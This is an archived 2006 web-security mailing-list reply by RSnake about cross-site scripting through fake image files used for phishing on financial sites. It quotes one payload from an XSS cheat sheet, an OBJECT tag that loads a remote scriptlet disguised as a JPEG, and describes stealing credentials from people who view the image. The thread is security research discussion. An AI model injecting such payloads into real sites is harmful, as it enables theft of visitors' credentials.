[WEB SECURITY] (XSS via file extension) XSS-Phishing on Financial Sites

RSnake rsnake at shocking.com
Wed Jun 28 12:01:21 EDT 2006


> Now I am thinking that I did miss something.  Does the jpeg have to break ? Is there anything that would keep your own embedded script in the fake jpeg from drawing a real jpeg as well ? For instance, load up a fake (script) image to the server, load up a real one, fake (script) image runs an exploit and then draws an image tag with the real one as the source, or an off-site one, etc.

No, it doesn't have to break, you're correct, you could ask it to
request another image held somewhere else, or even display an inline
data: directive, ala RFC2397.  I'm just saying it's way more obvious
when everyone who viewed an image gets their credentials stolen.  Verses
everyone who visited a completely unrelated website that could be 100%
in context (and even being a trusted site that also has an XSS exploit
in it) having their credentials stolen.

> I played with object and embed tags a bit last night and got no soup.  Of course qualifying that as just casual playing, not seriously concerted research.

The XSS Cheat Sheet http://ha.ckers.org/xss.html talks about a lot of
these vectors we've been discussing:

<OBJECT TYPE="text/x-scriptlet" 
DATA="http://ha.ckers.org/scriptlet.jpg"></OBJECT>

My major problem with these is that you have to be able to inject an
object tag.  If you can inject an object tag you've got bigger issues,
in my mind, which is why I haven't spent much time documenting these
types of vectors - they aren't practical given that the other things you
can do with them are far worse (like injecting viruses/trojans, etc...).

-RSnake
http://ha.ckers.org/
http://ha.ckers.org/xss.html
http://ha.ckers.org/blog/feed/

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]



More information about the websecurity mailing list